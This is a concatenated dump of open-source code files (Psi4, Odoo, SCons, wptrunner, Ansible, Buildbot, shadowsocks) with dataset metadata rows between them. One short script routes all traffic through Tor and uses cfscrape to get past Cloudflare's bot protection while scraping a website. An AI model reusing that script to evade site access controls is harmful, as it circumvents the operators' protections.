j: indexes elements of the flattened tensor at some displacement
Throws: none
"""
result = []
for job in db['job_status']:
with open('{}/output.dat'.format(job)) as outfile:
result.append(parse_geometry_matrix_data(outfile, signature, row_dim))
return result
# END collect_displaced_matrix_data()
def parse_geometry_matrix_data(outfile, matrix_name, row_tot):
"""
Parses data from a 3 by n matrix printed to a file
outfile: ( file ) handle open in read mode, where the data should be found
matrix_name: ( string ) that indicates the matrix data is found on the lines
below
    row_tot: ( int ) the number of lines the matrix data is expected to span
        in the file
Returns: matrix_data a list of matrix elements, len = 3*row_tot
    Throws: ParsingError (Collecting matrix data failed) if
        it can't find matrix_name in the file,
        it found matrix_name but no data, or
        it found matrix_name and data but the number of elements is
        incorrect.
"""
collect_matrix = False
n_rows = 0
n_tries = 0
matrix_data = []
for line in outfile:
if matrix_name in line:
collect_matrix = True
if collect_matrix and (n_rows < row_tot):
try:
n_tries += 1
if n_tries > (row_tot + 13):
                    raise p4util.ParsingError('{} Matrix was unreadable. Scanned {} '
                                              'lines.'.format(matrix_name, n_tries))
else:
(index, x, y, z) = line.split()
matrix_data.append(float(x))
matrix_data.append(float(y))
matrix_data.append(float(z))
n_rows += 1
except:
pass
if (n_rows == row_tot) and (len(matrix_data) != 3 * row_tot):
raise p4util.ParsingError('Collecting {} data failed!'
'\nExpected {} elements but only captured {}'.format(
matrix_name, 3 * row_tot, len(matrix_data)))
if len(matrix_data) == 3 * row_tot:
return matrix_data
raise p4util.ParsingError('data for {} was not found in the output file, '
'but it was marked for collection. Check output files '
'in displacement sub-dirs!'.format(matrix_name))
# END parse_geometry_matrix_data()
| lgpl-3.0 | -7,074,792,179,122,510,000 | 35.300885 | 84 | 0.62823 | false |
wangjun/odoo | openerp/addons/base/tests/test_menu.py | 501 | 1450 | import openerp.tests.common as common
class test_menu(common.TransactionCase):
def setUp(self):
super(test_menu,self).setUp()
self.Menus = self.registry('ir.ui.menu')
def test_00_menu_deletion(self):
"""Verify that menu deletion works properly when there are child menus, and those
are indeed made orphans"""
cr, uid, Menus = self.cr, self.uid, self.Menus
# Generic trick necessary for search() calls to avoid hidden menus
ctx = {'ir.ui.menu.full_list': True}
root_id = Menus.create(cr, uid, {'name': 'Test root'})
child1_id = Menus.create(cr, uid, {'name': 'Test child 1', 'parent_id': root_id})
child2_id = Menus.create(cr, uid, {'name': 'Test child 2', 'parent_id': root_id})
child21_id = Menus.create(cr, uid, {'name': 'Test child 2-1', 'parent_id': child2_id})
all_ids = [root_id, child1_id, child2_id, child21_id]
# delete and check that direct children are promoted to top-level
# cfr. explanation in menu.unlink()
Menus.unlink(cr, uid, [root_id])
remaining_ids = Menus.search(cr, uid, [('id', 'in', all_ids)], order="id", context=ctx)
self.assertEqual([child1_id, child2_id, child21_id], remaining_ids)
orphan_ids = Menus.search(cr, uid, [('id', 'in', all_ids), ('parent_id', '=', False)], order="id", context=ctx)
self.assertEqual([child1_id, child2_id], orphan_ids)
| agpl-3.0 | 6,516,303,362,321,979,000 | 44.3125 | 120 | 0.614483 | false |
angad/libjingle-mac | scons-2.2.0/engine/SCons/exitfuncs.py | 14 | 2436 | """SCons.exitfuncs
Register functions which are executed when SCons exits for any reason.
"""
#
# Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010, 2011, 2012 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/exitfuncs.py issue-2856:2676:d23b7a2f45e8 2012/08/05 15:38:28 garyo"
_exithandlers = []
def _run_exitfuncs():
"""run any registered exit functions
_exithandlers is traversed in reverse order so functions are executed
last in, first out.
"""
while _exithandlers:
func, targs, kargs = _exithandlers.pop()
func(*targs, **kargs)
def register(func, *targs, **kargs):
"""register a function to be executed upon normal program termination
func - function to be called at exit
targs - optional arguments to pass to func
kargs - optional keyword arguments to pass to func
"""
_exithandlers.append((func, targs, kargs))
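# Minimal usage sketch (not part of the original module; the callback and its
# arguments are purely illustrative):
#
#   def cleanup(tmpdir, verbose=False):
#       ...
#
#   register(cleanup, "/tmp/scons-build", verbose=True)
#
# cleanup() is then invoked from _run_exitfuncs() when the process exits.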
import sys
try:
x = sys.exitfunc
# if x isn't our own exit func executive, assume it's another
# registered exit function - append it to our list...
if x != _run_exitfuncs:
register(x)
except AttributeError:
pass
# make our exit function get run by python when it exits:
sys.exitfunc = _run_exitfuncs
del sys
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
| bsd-3-clause | 5,128,815,614,918,034,000 | 30.636364 | 107 | 0.724548 | false |
gpoesia/servo | tests/wpt/harness/wptrunner/manifestupdate.py | 116 | 17251 | # This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
import os
import urlparse
from collections import namedtuple, defaultdict
from wptmanifest.node import (DataNode, ConditionalNode, BinaryExpressionNode,
BinaryOperatorNode, VariableNode, StringNode, NumberNode,
UnaryExpressionNode, UnaryOperatorNode, KeyValueNode)
from wptmanifest.backends import conditional
from wptmanifest.backends.conditional import ManifestItem
import expected
"""Manifest structure used to update the expected results of a test
Each manifest file is represented by an ExpectedManifest that has one
or more TestNode children, one per test in the manifest. Each
TestNode has zero or more SubtestNode children, one for each known
subtest of the test.
In these representations, conditional expressions in the manifest are
not evaluated upfront but stored as python functions to be evaluated
at runtime.
When a result for a test is to be updated set_result on the
[Sub]TestNode is called to store the new result, alongside the
existing conditional that result's run info matched, if any. Once all
new results are known, coalesce_expected is called to compute the new
set of results and conditionals. The AST of the underlying parsed manifest
is updated with the changes, and the result is serialised to a file.
"""
Result = namedtuple("Result", ["run_info", "status"])
def data_cls_getter(output_node, visited_node):
# visited_node is intentionally unused
if output_node is None:
return ExpectedManifest
elif isinstance(output_node, ExpectedManifest):
return TestNode
elif isinstance(output_node, TestNode):
return SubtestNode
else:
raise ValueError
class ExpectedManifest(ManifestItem):
def __init__(self, node, test_path=None, url_base=None, property_order=None,
boolean_properties=None):
"""Object representing all the tests in a particular manifest
:param node: AST Node associated with this object. If this is None,
a new AST is created to associate with this manifest.
:param test_path: Path of the test file associated with this manifest.
:param url_base: Base url for serving the tests in this manifest.
:param property_order: List of properties to use in expectation metadata
from most to least significant.
:param boolean_properties: Set of properties in property_order that should
be treated as boolean.
"""
if node is None:
node = DataNode(None)
ManifestItem.__init__(self, node)
self.child_map = {}
self.test_path = test_path
self.url_base = url_base
assert self.url_base is not None
self.modified = False
self.boolean_properties = boolean_properties
self.property_order = property_order
def append(self, child):
ManifestItem.append(self, child)
if child.id in self.child_map:
print "Warning: Duplicate heading %s" % child.id
self.child_map[child.id] = child
def _remove_child(self, child):
del self.child_map[child.id]
ManifestItem._remove_child(self, child)
def get_test(self, test_id):
"""Return a TestNode by test id, or None if no test matches
:param test_id: The id of the test to look up"""
return self.child_map[test_id]
def has_test(self, test_id):
"""Boolean indicating whether the current test has a known child test
with id test id
:param test_id: The id of the test to look up"""
return test_id in self.child_map
@property
def url(self):
return urlparse.urljoin(self.url_base,
"/".join(self.test_path.split(os.path.sep)))
class TestNode(ManifestItem):
def __init__(self, node):
"""Tree node associated with a particular test in a manifest
:param node: AST node associated with the test"""
ManifestItem.__init__(self, node)
self.updated_expected = []
self.new_expected = []
self.subtests = {}
self.default_status = None
self._from_file = True
@classmethod
def create(cls, test_type, test_id):
"""Create a TestNode corresponding to a given test
:param test_type: The type of the test
:param test_id: The id of the test"""
url = test_id
name = url.split("/")[-1]
node = DataNode(name)
self = cls(node)
self.set("type", test_type)
self._from_file = False
return self
@property
def is_empty(self):
required_keys = set(["type"])
if set(self._data.keys()) != required_keys:
return False
return all(child.is_empty for child in self.children)
@property
def test_type(self):
"""The type of the test represented by this TestNode"""
return self.get("type", None)
@property
def id(self):
"""The id of the test represented by this TestNode"""
return urlparse.urljoin(self.parent.url, self.name)
def disabled(self, run_info):
"""Boolean indicating whether this test is disabled when run in an
environment with the given run_info
:param run_info: Dictionary of run_info parameters"""
return self.get("disabled", run_info) is not None
def set_result(self, run_info, result):
"""Set the result of the test in a particular run
:param run_info: Dictionary of run_info parameters corresponding
to this run
:param result: Status of the test in this run"""
if self.default_status is not None:
assert self.default_status == result.default_expected
else:
self.default_status = result.default_expected
# Add this result to the list of results satisfying
# any condition in the list of updated results it matches
for (cond, values) in self.updated_expected:
if cond(run_info):
values.append(Result(run_info, result.status))
if result.status != cond.value:
self.root.modified = True
break
else:
# We didn't find a previous value for this
self.new_expected.append(Result(run_info, result.status))
self.root.modified = True
def coalesce_expected(self):
"""Update the underlying manifest AST for this test based on all the
added results.
This will update existing conditionals if they got the same result in
all matching runs in the updated results, will delete existing conditionals
that get more than one different result in the updated run, and add new
conditionals for anything that doesn't match an existing conditional.
Conditionals not matched by any added result are not changed."""
final_conditionals = []
try:
unconditional_status = self.get("expected")
except KeyError:
unconditional_status = self.default_status
for conditional_value, results in self.updated_expected:
if not results:
# The conditional didn't match anything in these runs so leave it alone
final_conditionals.append(conditional_value)
elif all(results[0].status == result.status for result in results):
# All the new values for this conditional matched, so update the node
result = results[0]
if (result.status == unconditional_status and
conditional_value.condition_node is not None):
self.remove_value("expected", conditional_value)
else:
conditional_value.value = result.status
final_conditionals.append(conditional_value)
elif conditional_value.condition_node is not None:
# Blow away the existing condition and rebuild from scratch
# This isn't sure to work if we have a conditional later that matches
# these values too, but we can hope, verify that we get the results
# we expect, and if not let a human sort it out
self.remove_value("expected", conditional_value)
self.new_expected.extend(results)
elif conditional_value.condition_node is None:
self.new_expected.extend(result for result in results
if result.status != unconditional_status)
# It is an invariant that nothing in new_expected matches an existing
# condition except for the default condition
if self.new_expected:
if all(self.new_expected[0].status == result.status
for result in self.new_expected) and not self.updated_expected:
status = self.new_expected[0].status
if status != self.default_status:
self.set("expected", status, condition=None)
final_conditionals.append(self._data["expected"][-1])
else:
for conditional_node, status in group_conditionals(
self.new_expected,
property_order=self.root.property_order,
boolean_properties=self.root.boolean_properties):
if status != unconditional_status:
self.set("expected", status, condition=conditional_node.children[0])
final_conditionals.append(self._data["expected"][-1])
if ("expected" in self._data and
len(self._data["expected"]) > 0 and
self._data["expected"][-1].condition_node is None and
self._data["expected"][-1].value == self.default_status):
self.remove_value("expected", self._data["expected"][-1])
if ("expected" in self._data and
len(self._data["expected"]) == 0):
for child in self.node.children:
if (isinstance(child, KeyValueNode) and
child.data == "expected"):
child.remove()
break
def _add_key_value(self, node, values):
ManifestItem._add_key_value(self, node, values)
if node.data == "expected":
self.updated_expected = []
for value in values:
self.updated_expected.append((value, []))
def clear_expected(self):
"""Clear all the expected data for this test and all of its subtests"""
self.updated_expected = []
if "expected" in self._data:
for child in self.node.children:
if (isinstance(child, KeyValueNode) and
child.data == "expected"):
child.remove()
del self._data["expected"]
break
for subtest in self.subtests.itervalues():
subtest.clear_expected()
def append(self, node):
child = ManifestItem.append(self, node)
self.subtests[child.name] = child
def get_subtest(self, name):
"""Return a SubtestNode corresponding to a particular subtest of
the current test, creating a new one if no subtest with that name
already exists.
:param name: Name of the subtest"""
if name in self.subtests:
return self.subtests[name]
else:
subtest = SubtestNode.create(name)
self.append(subtest)
return subtest
class SubtestNode(TestNode):
def __init__(self, node):
assert isinstance(node, DataNode)
TestNode.__init__(self, node)
@classmethod
def create(cls, name):
node = DataNode(name)
self = cls(node)
return self
@property
def is_empty(self):
if self._data:
return False
return True
def group_conditionals(values, property_order=None, boolean_properties=None):
"""Given a list of Result objects, return a list of
(conditional_node, status) pairs representing the conditional
expressions that are required to match each status
:param values: List of Results
:param property_order: List of properties to use in expectation metadata
from most to least significant.
:param boolean_properties: Set of properties in property_order that should
be treated as boolean."""
by_property = defaultdict(set)
for run_info, status in values:
for prop_name, prop_value in run_info.iteritems():
by_property[(prop_name, prop_value)].add(status)
if property_order is None:
property_order = ["debug", "os", "version", "processor", "bits"]
if boolean_properties is None:
boolean_properties = set(["debug"])
else:
boolean_properties = set(boolean_properties)
# If we have more than one value, remove any properties that are common
# for all the values
if len(values) > 1:
for key, statuses in by_property.copy().iteritems():
if len(statuses) == len(values):
del by_property[key]
properties = set(item[0] for item in by_property.iterkeys())
include_props = []
for prop in property_order:
if prop in properties:
include_props.append(prop)
conditions = {}
for run_info, status in values:
prop_set = tuple((prop, run_info[prop]) for prop in include_props)
if prop_set in conditions:
continue
expr = make_expr(prop_set, status, boolean_properties=boolean_properties)
conditions[prop_set] = (expr, status)
return conditions.values()
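# Illustrative example (hypothetical run_info values): given
#   Result({"os": "linux", "debug": False}, "PASS")
#   Result({"os": "win",   "debug": False}, "FAIL")
# group_conditionals() returns (conditional AST, status) pairs roughly
# equivalent to the manifest conditions
#   if os == "linux": PASS
#   if os == "win": FAIL
# with make_expr() below building the AST for each property set.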
def make_expr(prop_set, status, boolean_properties=None):
"""Create an AST that returns the value ``status`` given all the
properties in prop_set match.
:param prop_set: tuple of (property name, value) pairs for each
property in this expression and the value it must match
:param status: Status on RHS when all the given properties match
:param boolean_properties: Set of properties in property_order that should
be treated as boolean.
"""
root = ConditionalNode()
assert len(prop_set) > 0
expressions = []
for prop, value in prop_set:
number_types = (int, float, long)
value_cls = (NumberNode
if type(value) in number_types
else StringNode)
if prop not in boolean_properties:
expressions.append(
BinaryExpressionNode(
BinaryOperatorNode("=="),
VariableNode(prop),
value_cls(unicode(value))
))
else:
if value:
expressions.append(VariableNode(prop))
else:
expressions.append(
UnaryExpressionNode(
UnaryOperatorNode("not"),
VariableNode(prop)
))
if len(expressions) > 1:
prev = expressions[-1]
for curr in reversed(expressions[:-1]):
node = BinaryExpressionNode(
BinaryOperatorNode("and"),
curr,
prev)
prev = node
else:
node = expressions[0]
root.append(node)
root.append(StringNode(status))
return root
def get_manifest(metadata_root, test_path, url_base, property_order=None,
boolean_properties=None):
"""Get the ExpectedManifest for a particular test path, or None if there is no
metadata stored for that test path.
:param metadata_root: Absolute path to the root of the metadata directory
:param test_path: Path to the test(s) relative to the test root
:param url_base: Base url for serving the tests in this manifest
:param property_order: List of properties to use in expectation metadata
from most to least significant.
:param boolean_properties: Set of properties in property_order that should
be treated as boolean."""
manifest_path = expected.expected_path(metadata_root, test_path)
try:
with open(manifest_path) as f:
return compile(f, test_path, url_base, property_order=property_order,
boolean_properties=boolean_properties)
except IOError:
return None
def compile(manifest_file, test_path, url_base, property_order=None,
boolean_properties=None):
return conditional.compile(manifest_file,
data_cls_getter=data_cls_getter,
test_path=test_path,
url_base=url_base,
property_order=property_order,
boolean_properties=boolean_properties)
| mpl-2.0 | 2,270,650,863,544,289,500 | 37.081678 | 92 | 0.607385 | false |
LorneWu/e-Gental-downloader | note tor_try_cloudflare_fail.py | 1 | 1111 | import socks
import socket
from urllib.request import urlopen
import requests
import header_s
import time
from bs4 import BeautifulSoup
socks.set_default_proxy(socks.SOCKS5, "localhost", 9050)
socket.socket = socks.socksocket
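# Replacing socket.socket with the SOCKS wrapper routes every subsequent
# connection (requests, urllib, cfscrape) through the local Tor SOCKS5 proxy
# on port 9050, which is what the two icanhazip checks below verify.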
print(requests.get('http://icanhazip.com').text)
print(urlopen('http://icanhazip.com').read())
url = 'https://e-hentai.org/?f_doujinshi=1&f_manga=1&f_artistcg=1&f_gamecg=1&f_western=1&f_non-h=1&f_imageset=1&f_cosplay=1&f_asianporn=1&f_misc=1&f_search=Miyuko&f_apply=Apply+Filter'
header_s.getprofile()
import cfscrape
while True:
try:
scraper = cfscrape.create_scraper() # returns a CloudflareScraper instance
# Or: scraper = cfscrape.CloudflareScraper() # CloudflareScraper inherits from requests.Session
        html = scraper.get(url, headers=header_s.file_1)  # was: requests.get(url, headers=header_s.file_1)
        print(html)
#print(html.text)
except Exception as e:
print(e)
else:
sp = BeautifulSoup(html.text,'html.parser')
print(sp.select('title'))
time.sleep(10) | gpl-3.0 | -138,625,734,406,110,530 | 33.75 | 184 | 0.70297 | false |
aperigault/ansible | lib/ansible/modules/cloud/amazon/ec2_metric_alarm.py | 11 | 12566 | #!/usr/bin/python
# Copyright: Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['stableinterface'],
'supported_by': 'community'}
DOCUMENTATION = """
module: ec2_metric_alarm
short_description: "Create/update or delete AWS Cloudwatch 'metric alarms'"
description:
- Can create or delete AWS metric alarms.
- Metrics you wish to alarm on must already exist.
version_added: "1.6"
author: "Zacharie Eakin (@Zeekin)"
options:
state:
description:
- register or deregister the alarm
required: true
choices: ['present', 'absent']
name:
description:
- Unique name for the alarm
required: true
metric:
description:
- Name of the monitored metric (e.g. CPUUtilization)
- Metric must already exist
required: false
namespace:
description:
- Name of the appropriate namespace ('AWS/EC2', 'System/Linux', etc.), which determines the category it will appear under in cloudwatch
required: false
statistic:
description:
- Operation applied to the metric
- Works in conjunction with period and evaluation_periods to determine the comparison value
required: false
choices: ['SampleCount','Average','Sum','Minimum','Maximum']
comparison:
description:
- Determines how the threshold value is compared
required: false
choices: ['<=','<','>','>=']
threshold:
description:
- Sets the min/max bound for triggering the alarm
required: false
period:
description:
- The time (in seconds) between metric evaluations
required: false
evaluation_periods:
description:
- The number of times in which the metric is evaluated before final calculation
required: false
unit:
description:
- The threshold's unit of measurement
required: false
choices:
- 'Seconds'
- 'Microseconds'
- 'Milliseconds'
- 'Bytes'
- 'Kilobytes'
- 'Megabytes'
- 'Gigabytes'
- 'Terabytes'
- 'Bits'
- 'Kilobits'
- 'Megabits'
- 'Gigabits'
- 'Terabits'
- 'Percent'
- 'Count'
- 'Bytes/Second'
- 'Kilobytes/Second'
- 'Megabytes/Second'
- 'Gigabytes/Second'
- 'Terabytes/Second'
- 'Bits/Second'
- 'Kilobits/Second'
- 'Megabits/Second'
- 'Gigabits/Second'
- 'Terabits/Second'
- 'Count/Second'
- 'None'
description:
description:
- A longer description of the alarm
required: false
dimensions:
description:
- Describes to what the alarm is applied
required: false
alarm_actions:
description:
- A list of the names action(s) taken when the alarm is in the 'alarm' status, denoted as Amazon Resource Name(s)
required: false
insufficient_data_actions:
description:
- A list of the names of action(s) to take when the alarm is in the 'insufficient_data' status
required: false
ok_actions:
description:
- A list of the names of action(s) to take when the alarm is in the 'ok' status, denoted as Amazon Resource Name(s)
required: false
extends_documentation_fragment:
- aws
- ec2
"""
EXAMPLES = '''
- name: create alarm
ec2_metric_alarm:
state: present
region: ap-southeast-2
name: "cpu-low"
metric: "CPUUtilization"
namespace: "AWS/EC2"
statistic: Average
comparison: "<="
threshold: 5.0
period: 300
evaluation_periods: 3
unit: "Percent"
description: "This will alarm when a bamboo slave's cpu usage average is lower than 5% for 15 minutes "
dimensions: {'InstanceId':'i-XXX'}
alarm_actions: ["action1","action2"]
- name: Create an alarm to recover a failed instance
ec2_metric_alarm:
state: present
region: us-west-1
name: "recover-instance"
metric: "StatusCheckFailed_System"
namespace: "AWS/EC2"
statistic: "Minimum"
comparison: ">="
threshold: 1.0
period: 60
evaluation_periods: 2
unit: "Count"
description: "This will recover an instance when it fails"
dimensions: {"InstanceId":'i-XXX'}
alarm_actions: ["arn:aws:automate:us-west-1:ec2:recover"]
'''
try:
import boto.ec2.cloudwatch
from boto.ec2.cloudwatch import MetricAlarm
from boto.exception import BotoServerError, NoAuthHandlerFound
except ImportError:
pass # Taken care of by ec2.HAS_BOTO
import traceback
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ec2 import (AnsibleAWSError, HAS_BOTO, connect_to_aws, ec2_argument_spec,
get_aws_connection_info)
def create_metric_alarm(connection, module):
name = module.params.get('name')
metric = module.params.get('metric')
namespace = module.params.get('namespace')
statistic = module.params.get('statistic')
comparison = module.params.get('comparison')
threshold = module.params.get('threshold')
period = module.params.get('period')
evaluation_periods = module.params.get('evaluation_periods')
unit = module.params.get('unit')
description = module.params.get('description')
dimensions = module.params.get('dimensions')
alarm_actions = module.params.get('alarm_actions')
insufficient_data_actions = module.params.get('insufficient_data_actions')
ok_actions = module.params.get('ok_actions')
alarms = None
try:
alarms = connection.describe_alarms(alarm_names=[name])
except BotoServerError as e:
module.fail_json(msg="Failed to describe alarm %s: %s" % (name, str(e)), exception=traceback.format_exc())
if not alarms:
alm = MetricAlarm(
name=name,
metric=metric,
namespace=namespace,
statistic=statistic,
comparison=comparison,
threshold=threshold,
period=period,
evaluation_periods=evaluation_periods,
unit=unit,
description=description,
dimensions=dimensions,
alarm_actions=alarm_actions,
insufficient_data_actions=insufficient_data_actions,
ok_actions=ok_actions
)
try:
connection.create_alarm(alm)
changed = True
alarms = connection.describe_alarms(alarm_names=[name])
except BotoServerError as e:
module.fail_json(msg="Failed to create alarm %s: %s" % (name, str(e)), exception=traceback.format_exc())
else:
alarm = alarms[0]
changed = False
for attr in ('comparison', 'metric', 'namespace', 'statistic', 'threshold', 'period', 'evaluation_periods', 'unit', 'description'):
if getattr(alarm, attr) != module.params.get(attr):
changed = True
setattr(alarm, attr, module.params.get(attr))
# this is to deal with a current bug where you cannot assign '<=>' to the comparator when modifying an existing alarm
comparison = alarm.comparison
comparisons = {'<=': 'LessThanOrEqualToThreshold', '<': 'LessThanThreshold', '>=': 'GreaterThanOrEqualToThreshold', '>': 'GreaterThanThreshold'}
alarm.comparison = comparisons[comparison]
dim1 = module.params.get('dimensions')
dim2 = alarm.dimensions
for keys in dim1:
if not isinstance(dim1[keys], list):
dim1[keys] = [dim1[keys]]
if keys not in dim2 or dim1[keys] != dim2[keys]:
changed = True
setattr(alarm, 'dimensions', dim1)
for attr in ('alarm_actions', 'insufficient_data_actions', 'ok_actions'):
action = module.params.get(attr) or []
# Boto and/or ansible may provide same elements in lists but in different order.
# Compare on sets since they do not need any order.
if set(getattr(alarm, attr)) != set(action):
changed = True
setattr(alarm, attr, module.params.get(attr))
try:
if changed:
connection.create_alarm(alarm)
except BotoServerError as e:
module.fail_json(msg=str(e))
result = alarms[0]
module.exit_json(changed=changed, name=result.name,
actions_enabled=result.actions_enabled,
alarm_actions=result.alarm_actions,
alarm_arn=result.alarm_arn,
comparison=result.comparison,
description=result.description,
dimensions=result.dimensions,
evaluation_periods=result.evaluation_periods,
insufficient_data_actions=result.insufficient_data_actions,
last_updated=result.last_updated,
metric=result.metric,
namespace=result.namespace,
ok_actions=result.ok_actions,
period=result.period,
state_reason=result.state_reason,
state_value=result.state_value,
statistic=result.statistic,
threshold=result.threshold,
unit=result.unit)
def delete_metric_alarm(connection, module):
name = module.params.get('name')
alarms = None
try:
alarms = connection.describe_alarms(alarm_names=[name])
except BotoServerError as e:
module.fail_json(msg="Failed to describe alarm %s: %s" % (name, str(e)), exception=traceback.format_exc())
if alarms:
try:
connection.delete_alarms([name])
module.exit_json(changed=True)
except BotoServerError as e:
module.fail_json(msg=str(e))
else:
module.exit_json(changed=False)
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(
dict(
name=dict(required=True, type='str'),
metric=dict(type='str'),
namespace=dict(type='str'),
statistic=dict(type='str', choices=['SampleCount', 'Average', 'Sum', 'Minimum', 'Maximum']),
comparison=dict(type='str', choices=['<=', '<', '>', '>=']),
threshold=dict(type='float'),
period=dict(type='int'),
unit=dict(type='str', choices=['Seconds', 'Microseconds', 'Milliseconds', 'Bytes', 'Kilobytes', 'Megabytes', 'Gigabytes', 'Terabytes',
'Bits', 'Kilobits', 'Megabits', 'Gigabits', 'Terabits', 'Percent', 'Count', 'Bytes/Second', 'Kilobytes/Second',
'Megabytes/Second', 'Gigabytes/Second', 'Terabytes/Second', 'Bits/Second', 'Kilobits/Second', 'Megabits/Second',
'Gigabits/Second', 'Terabits/Second', 'Count/Second', 'None']),
evaluation_periods=dict(type='int'),
description=dict(type='str'),
dimensions=dict(type='dict', default={}),
alarm_actions=dict(type='list'),
insufficient_data_actions=dict(type='list'),
ok_actions=dict(type='list'),
state=dict(default='present', choices=['present', 'absent']),
)
)
module = AnsibleModule(argument_spec=argument_spec)
if not HAS_BOTO:
module.fail_json(msg='boto required for this module')
state = module.params.get('state')
region, ec2_url, aws_connect_params = get_aws_connection_info(module)
if region:
try:
connection = connect_to_aws(boto.ec2.cloudwatch, region, **aws_connect_params)
except (NoAuthHandlerFound, AnsibleAWSError) as e:
module.fail_json(msg=str(e))
else:
module.fail_json(msg="region must be specified")
if state == 'present':
create_metric_alarm(connection, module)
elif state == 'absent':
delete_metric_alarm(connection, module)
if __name__ == '__main__':
main()
| gpl-3.0 | -1,040,837,811,964,048,900 | 35.423188 | 155 | 0.587617 | false |
ulnic/weatherSensor | data/ConfigurationReader.py | 1 | 2775 | #!/usr/bin/python
"""
Configuration Handler
"""
import logging
# noinspection PyCompatibility
import ConfigParser
import data.Constants
logger = logging.getLogger(data.Constants.Constant.LOGGER_NAME)
class ConfigurationReader(object):
"""
Class handling the configuration parser from the configuration.ini file
"""
def __init__(self):
logger.info('Reading configurations from file')
self.parser = ConfigParser.SafeConfigParser()
self.parser.read(data.Constants.Constant.CONFIG_FILE_NAME)
def get_key_in_section(self, _section_name, _key_name):
"""
Retrieves the specific KEY from the SECTION in the configuration.ini file
:param _section_name: The CONFIG section to parse
:param _key_name: The KEY in the config section to read
:return: The value from the KEY inside the SECTION
"""
return self.parser.get(_section_name, _key_name)
def get_bool_key_in_section(self, _section_name, _key_name):
"""
        Retrieves and converts to BOOLEAN, the specific KEY from the SECTION in the configuration.ini file
        :param _section_name: The CONFIG section to parse
        :param _key_name: The KEY in the config section to read
        :return: The BOOLEAN value from the KEY inside the SECTION
"""
return self.parser.getboolean(_section_name, _key_name)
def get_int_key_in_section(self, _section_name, _key_name):
"""
        Retrieves and converts to INTEGER, the specific KEY from the SECTION in the configuration.ini file
        :param _section_name: The CONFIG section to parse
        :param _key_name: The KEY in the config section to read
        :return: The INTEGER value from the KEY inside the SECTION
"""
return self.parser.getint(_section_name, _key_name)
def get_all_section_names(self):
"""
Returns a list of config section names.
:return: List of all found sections in configuration.ini file.
"""
return [m for m in self.parser.sections()]
def has_sensor_section(self, _section_name):
"""
Queries the config file and return bool indicating if section found
:param _section_name: Section to search for
:return: BOOL indicating if the section was found
"""
return self.parser.has_section(_section_name)
def get_sensor_keys(self, _section_name):
"""
Retrieves all sensor keys under the section
:param _section_name: Section in config file to get keys from
:return: List of found key-values
"""
key_value_dict = {}
for name, value in self.parser.items(_section_name):
key_value_dict[name] = value
return key_value_dict
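# Example usage (section and key names are made up for illustration):
#
#   reader = ConfigurationReader()
#   if reader.has_sensor_section("DHT22"):
#       pin = reader.get_int_key_in_section("DHT22", "gpio_pin")
#       enabled = reader.get_bool_key_in_section("DHT22", "enabled")
#       settings = reader.get_sensor_keys("DHT22")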
| mit | 3,018,315,172,325,340,700 | 36 | 106 | 0.654054 | false |
rodrigc/buildbot | master/buildbot/test/unit/util/test_netstrings.py | 6 | 1708 | # This file is part of Buildbot. Buildbot is free software: you can
# redistribute it and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation, version 2.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51
# Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Copyright Buildbot Team Members
from twisted.protocols import basic
from twisted.trial import unittest
from buildbot.util import netstrings
class NetstringParser(unittest.TestCase):
def test_valid_netstrings(self):
p = netstrings.NetstringParser()
p.feed("5:hello,5:world,")
self.assertEqual(p.strings, [b'hello', b'world'])
def test_valid_netstrings_byte_by_byte(self):
# (this is really testing twisted's support, but oh well)
p = netstrings.NetstringParser()
[p.feed(c) for c in "5:hello,5:world,"]
self.assertEqual(p.strings, [b'hello', b'world'])
def test_invalid_netstring(self):
p = netstrings.NetstringParser()
with self.assertRaises(basic.NetstringParseError):
p.feed("5-hello!")
def test_incomplete_netstring(self):
p = netstrings.NetstringParser()
p.feed("11:hello world,6:foob")
# note that the incomplete 'foobar' does not appear here
self.assertEqual(p.strings, [b'hello world'])
| gpl-2.0 | 1,147,959,568,604,553,000 | 36.955556 | 79 | 0.706089 | false |
kigawas/shadowsocks | shadowsocks/daemon.py | 694 | 5602 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2014-2015 clowwindy
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
